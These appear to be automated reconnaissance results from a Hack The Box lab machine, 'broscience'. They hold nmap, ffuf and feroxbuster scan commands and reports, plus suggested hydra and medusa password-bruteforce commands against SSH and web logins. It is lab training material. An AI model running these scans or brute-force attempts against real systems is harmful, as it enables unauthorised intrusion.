nmap -vv --reason -Pn -T4 -sV -p 80 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp80/xml/tcp_80_http_nmap.xml" 10.10.11.195
curl -sk -o /dev/null -H "Host: XahIdBWOUUpjNeHUGBsD.broscience.htb" http://broscience.htb:80/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v http://10.10.11.195:80 2>&1
wkhtmltoimage --format png http://10.10.11.195:80/ /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_screenshot.png
feroxbuster -u https://10.10.11.195:443/ -t 10 -w /root/.local/share/AutoRecon/wordlists/dirbuster.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -q -e -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_feroxbuster_dirbuster.txt"
curl -sSikf https://10.10.11.195:443/.well-known/security.txt
curl -sSikf https://10.10.11.195:443/robots.txt
curl -sSik https://10.10.11.195:443/
nmap -vv --reason -Pn -T4 -sV -p 443 --script="banner,(http* or ssl*) and not (brute or broadcast or dos or external or http-slowloris* or fuzzer)" -oN "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_nmap.txt" -oX "/home/kali/htb/broscience/results/scans/tcp443/xml/tcp_443_https_nmap.xml" 10.10.11.195
sslscan --show-certificate --no-colour 10.10.11.195:443 2>&1
curl -sk -o /dev/null -H "Host: uQOhNjfxSNsplaFtrAtO.broscience.htb" https://broscience.htb:443/ -w "%{size_download}"
whatweb --color=never --no-errors -a 3 -v https://10.10.11.195:443 2>&1
wkhtmltoimage --format png https://10.10.11.195:443/ /home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_screenshot.png
ffuf -u http://broscience.htb:80/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.broscience.htb" -fs 332 -noninteractive -s | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_broscience.htb_vhosts_subdomains-top1million-110000.txt"
ffuf -u https://broscience.htb:443/ -t 10 -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.broscience.htb" -fs 9308 -noninteractive -s | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_broscience.htb_vhosts_subdomains-top1million-110000.txt"


@@ -0,0 +1,103 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -p- -oN /home/kali/htb/broscience/results/scans/_full_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_full_tcp_nmap.xml 10.10.11.195
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.040s latency).
Scanned at 2023-02-01 17:49:39 CET for 62s
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)
| ssh-rsa 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
| 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=
| 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.54
|_http-title: Did not follow redirect to https://broscience.htb/
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.54 (Debian)
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.54 ((Debian))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT/emailAddress=administrator@broscience.htb/localityName=Vienna
| Issuer: commonName=broscience.htb/organizationName=BroScience/countryName=AT/emailAddress=administrator@broscience.htb/localityName=Vienna
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-14T19:48:36
| Not valid after: 2023-07-14T19:48:36
| MD5: 5328ddd62f3429d11d26ae8a68d86e0c
| SHA-1: 20568d0d9e4109cde5a22021fe3f349c40d8d75b
| -----BEGIN CERTIFICATE-----
| MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL
| BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv
| U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW
| HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN
| MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw
| EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG
| CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ
| KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK
| B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N
| j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d
| mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6
| Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa
| gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1
| m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY
| BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL
| 7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ
| Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG
| BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5
| PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A
| WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD
| AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC
| H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK
| atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb
| TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj
| +Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O
| r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6
| QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO
| P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm
| w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx
| Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK
| bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc
| dfC1SCd82A==
|_-----END CERTIFICATE-----
|_http-server-header: Apache/2.4.54 (Debian)
| tls-alpn:
|_ http/1.1
|_ssl-date: TLS randomness does not represent time
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: Linux 4.15 - 5.6 (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (93%), Linux 3.1 (93%), Linux 3.2 (93%), Linux 5.0 - 5.3 (92%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Linux 5.0 (91%), Crestron XPanel control system (91%), Adtran 424RG FTTH gateway (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=2/1%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63DA9861%P=x86_64-pc-linux-gnu)
SEQ(SP=105%GCD=1%ISR=106%TI=Z%CI=Z%II=I%TS=A)
OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%TG=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%TG=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=N)
IE(R=Y%DFI=N%TG=40%CD=S)
Uptime guess: 28.623 days (since Wed Jan 4 02:53:32 2023)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 25.54 ms 10.10.16.1
2 57.25 ms broscience.htb (10.10.11.195)
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Feb 1 17:50:41 2023 -- 1 IP address (1 host up) scanned in 62.65 seconds


@@ -0,0 +1,112 @@
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.195
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.195
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.10.11.195:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.195/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.195 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.195/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.195 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.10.11.195:80 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.10.11.195:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] http on tcp/443
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u https://10.10.11.195:443 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 443 -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_auth_hydra.txt" https-get://10.10.11.195/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 443 -O "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_auth_medusa.txt" -M http -h 10.10.11.195 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 443 -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_form_hydra.txt" https-post-form://10.10.11.195/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 443 -O "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_form_medusa.txt" -M web-form -h 10.10.11.195 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h https://10.10.11.195:443 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url https://10.10.11.195:443/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_wpscan.txt"
[*] ssh on tcp/22
[-] Bruteforce logins:
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 22 -o "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_hydra.txt" ssh://10.10.11.195
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 22 -O "/home/kali/htb/broscience/results/scans/tcp22/tcp_22_ssh_medusa.txt" -M ssh -h 10.10.11.195
[*] http on tcp/80
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u http://10.10.11.195:80 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_auth_hydra.txt" http-get://10.10.11.195/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_auth_medusa.txt" -M http -h 10.10.11.195 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 80 -o "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_form_hydra.txt" http-post-form://10.10.11.195/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 80 -O "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_form_medusa.txt" -M web-form -h 10.10.11.195 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h http://10.10.11.195:80 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url http://10.10.11.195:80/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp80/tcp_80_http_wpscan.txt"
[*] http on tcp/443
[-] (feroxbuster) Multi-threaded recursive directory/file enumeration for web servers using various wordlists:
feroxbuster -u https://10.10.11.195:443 -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x "txt,html,php,asp,aspx,jsp" -v -k -n -e -o /home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_feroxbuster_dirbuster.txt
[-] Credential bruteforcing commands (don't run these without modifying them):
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 443 -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_auth_hydra.txt" https-get://10.10.11.195/path/to/auth/area
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 443 -O "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_auth_medusa.txt" -M http -h 10.10.11.195 -m DIR:/path/to/auth/area
hydra -L "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e nsr -s 443 -o "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_form_hydra.txt" https-post-form://10.10.11.195/path/to/login.php:"username=^USER^&password=^PASS^":"invalid-login-message"
medusa -U "/usr/share/seclists/Usernames/top-usernames-shortlist.txt" -P "/usr/share/seclists/Passwords/darkweb2017-top100.txt" -e ns -n 443 -O "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_form_medusa.txt" -M web-form -h 10.10.11.195 -m FORM:/path/to/login.php -m FORM-DATA:"post?username=&password=" -m DENY-SIGNAL:"invalid login message"
[-] (nikto) old but generally reliable web server enumeration tool:
nikto -ask=no -h https://10.10.11.195:443 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_nikto.txt"
[-] (wpscan) WordPress Security Scanner (useful if WordPress is found):
wpscan --url https://10.10.11.195:443/ --no-update -e vp,vt,tt,cb,dbe,u,m --plugins-detection aggressive --plugins-version-detection aggressive -f cli-no-color 2>&1 | tee "/home/kali/htb/broscience/results/scans/tcp443/tcp_443_https_wpscan.txt"


@@ -0,0 +1,64 @@
Identified HTTP Server: Apache/2.4.54 (Debian)
Identified HTTP Server: Apache/2.4.54 (Debian)
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Identified HTTP Server: Apache/2.4.54 (Debian)
Identified HTTP Server: Apache/2.4.54 (Debian)
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized
Matched Pattern: Unauthorized


@@ -0,0 +1,107 @@
# Nmap 7.93 scan initiated Wed Feb 1 17:49:39 2023 as: nmap -vv --reason -Pn -T4 -sV -sC --version-all -A --osscan-guess -oN /home/kali/htb/broscience/results/scans/_quick_tcp_nmap.txt -oX /home/kali/htb/broscience/results/scans/xml/_quick_tcp_nmap.xml 10.10.11.195
Nmap scan report for broscience.htb (10.10.11.195)
Host is up, received user-set (0.048s latency).
Scanned at 2023-02-01 17:49:39 CET for 34s
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 df17c6bab18222d91db5ebff5d3d2cb7 (RSA)
| ssh-rsa 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
| 256 3f8a56f8958faeafe3ae7eb880f679d2 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCgM9UKdxFmXRJESXdlb+BSl+K1F0YCkOjSa8l+tgD6Y3mslSfrawZkdfq8NKLZlmOe8uf1ykgXjLWVDQ9NrJBk=
| 256 3c6575274ae2ef9391374cfdd9d46341 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMwR+IfRojCwiMuM3tZvdD5JCD2MRVum9frUha60bkN
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.54
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to https://broscience.htb/
|_http-server-header: Apache/2.4.54 (Debian)
443/tcp open ssl/http syn-ack ttl 63 Apache httpd 2.4.54 ((Debian))
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.54 (Debian)
| ssl-cert: Subject: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb
| Issuer: commonName=broscience.htb/organizationName=BroScience/countryName=AT/localityName=Vienna/emailAddress=administrator@broscience.htb
| Public Key type: rsa
| Public Key bits: 4096
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2022-07-14T19:48:36
| Not valid after: 2023-07-14T19:48:36
| MD5: 5328ddd62f3429d11d26ae8a68d86e0c
| SHA-1: 20568d0d9e4109cde5a22021fe3f349c40d8d75b
| -----BEGIN CERTIFICATE-----
| MIIF0zCCA7ugAwIBAgIUD+qpK08oB9Kng1mp3mIxnO21+s4wDQYJKoZIhvcNAQEL
| BQAweTELMAkGA1UEBhMCQVQxDzANBgNVBAcMBlZpZW5uYTETMBEGA1UECgwKQnJv
| U2NpZW5jZTEXMBUGA1UEAwwOYnJvc2NpZW5jZS5odGIxKzApBgkqhkiG9w0BCQEW
| HGFkbWluaXN0cmF0b3JAYnJvc2NpZW5jZS5odGIwHhcNMjIwNzE0MTk0ODM2WhcN
| MjMwNzE0MTk0ODM2WjB5MQswCQYDVQQGEwJBVDEPMA0GA1UEBwwGVmllbm5hMRMw
| EQYDVQQKDApCcm9TY2llbmNlMRcwFQYDVQQDDA5icm9zY2llbmNlLmh0YjErMCkG
| CSqGSIb3DQEJARYcYWRtaW5pc3RyYXRvckBicm9zY2llbmNlLmh0YjCCAiIwDQYJ
| KoZIhvcNAQEBBQADggIPADCCAgoCggIBAKcyX2E/e8BqyRU6FoKOWoWFJo6nLHhK
| B0wNgmPrcUZ5ycizPc+6ereoFgzZmj5qI0lBW4ZZNn5m5nBcAlVxCC6qzT+vUY1N
| j8VyC0seh90AJYGXHylWOJoEl+a8UOrbirbkuvJNhwG6Eryo2enWgmSkyHHIjH2d
| mS29vmydxAJafTR04IQkbmyfhbuYMEl5aZZQCS+ZuA+5MRCWbpZg8E02O5zAWSa6
| Kc3W1DnjEFJNECY9fwiga842sR7QxQYaJN30bBQAG0DJgay6Af+7cB82czIt8aRa
| gcrkrCeBtWc6t0VXyCOAqeVSghqzYhZuAbGQaQJN/lgcVL2Zky8Jte70EGW9Lsq1
| m6o92goMCfEFKxKieD0niVtOW1v/mkuwMG7R6VRY9D6ySn9jTK0WmmBYX0V145oY
| BU8WUbhAqZAPb/vsayGmVsKaX6ruNUO0t07ZhMjO8GO1mBh507+3YRtYztwueCOL
| 7e3N5jdOWXIauGXQafo9jhuhletktmeFs5ytM5gTf0X7R+Ink2coum5TI/KVK2WQ
| Lb+oSOkgqbrVpIyr3YrpqW1NnyekPweUbC/n4/uSZv1+9QHjGJ3aQtWmf73JFCkG
| BBeirNufb4/imdX8GZpkJs35kcL32gRyfpLHF9gyEIbW9NEnX1kpg8VfCrUJOjR5
| PFedjVtw4G/bAgMBAAGjUzBRMB0GA1UdDgQWBBR8vMUiyG5QWyER5cOhk24raL+A
| WjAfBgNVHSMEGDAWgBR8vMUiyG5QWyER5cOhk24raL+AWjAPBgNVHRMBAf8EBTAD
| AQH/MA0GCSqGSIb3DQEBCwUAA4ICAQCjEIzE+EpLeuGgCY18AREB4t2xSwqiYgqC
| H+gRoSbQ64xpNrbjOLBeyB4b1FotYdquKiaiFs7P1taY7hQiyHGFk4HOJlhyBnRK
| atjKt6ZE24yWgsGikGx0D57SYTeJwhqafYRnNuqNPCvnvhO1zQjMTl03T30PvSeb
| TDfcgd3rzG72w4S/zL59Vr4kr9Js01LpjDgt2Kyd5zW4RZKHA+RdIE+ePJXZaTwj
| +Ko8QzNKwt3qDlOXAV5MiqUfKPHyg6Rzq8i5bKNMpwU1UxYGpE64T0t+IfhiOX/O
| r/dW59nLXoHTGhqwAStFCzCqu+6Jfod2wFb+9Ty5rctVIpHw2XMEKfC8DSewvCc6
| QjMMMCRc2vpkc/YHberK+VYb8eVf4GcKzq6ns341jZ0FAwNEpB6tY6eeGovOLeeO
| P5ONg9XAO8EipKj/tJhmIZ2G6GHKh1Enj7zg1DoGCMttLeaC5lMzaxAWdwUplaBm
| w/+0dzFuuJL+XlxQIrVpGpmJOmBvPq/WvzU6ZFi4UwbHkow5EVvUPvW2GmTVecpx
| Or1X3z3W5aGvj1tH2OcqY5WTcgDNoBtFc3tob8xNd7KB88DQfNbSHuFShKymwAVK
| bcb0jeUT6YRF6NEmoLu80xyrro+Ejt1fLd3WE6q4+BXvhdj62OPtt5ue2rEhycgc
| dfC1SCd82A==
|_-----END CERTIFICATE-----
|_http-title: BroScience : Home
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
OS fingerprint not ideal because: Didn't receive UDP response. Please try again with -sSU
Aggressive OS guesses: Linux 4.15 - 5.6 (94%), Linux 5.3 - 5.4 (94%), Linux 2.6.32 (94%), Linux 5.0 - 5.3 (93%), Linux 3.1 (93%), Linux 3.2 (93%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (92%), Crestron XPanel control system (91%), Linux 5.4 (91%), Linux 2.6.39 - 3.2 (90%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.93%E=4%D=2/1%OT=22%CT=1%CU=%PV=Y%DS=2%DC=T%G=N%TM=63DA9845%P=x86_64-pc-linux-gnu)
SEQ(SP=102%GCD=1%ISR=10C%TI=Z%CI=Z%II=I%TS=A)
OPS(O1=M54BST11NW7%O2=M54BST11NW7%O3=M54BNNT11NW7%O4=M54BST11NW7%O5=M54BST11NW7%O6=M54BST11)
WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)
ECN(R=Y%DF=Y%TG=40%W=FAF0%O=M54BNNSNW7%CC=Y%Q=)
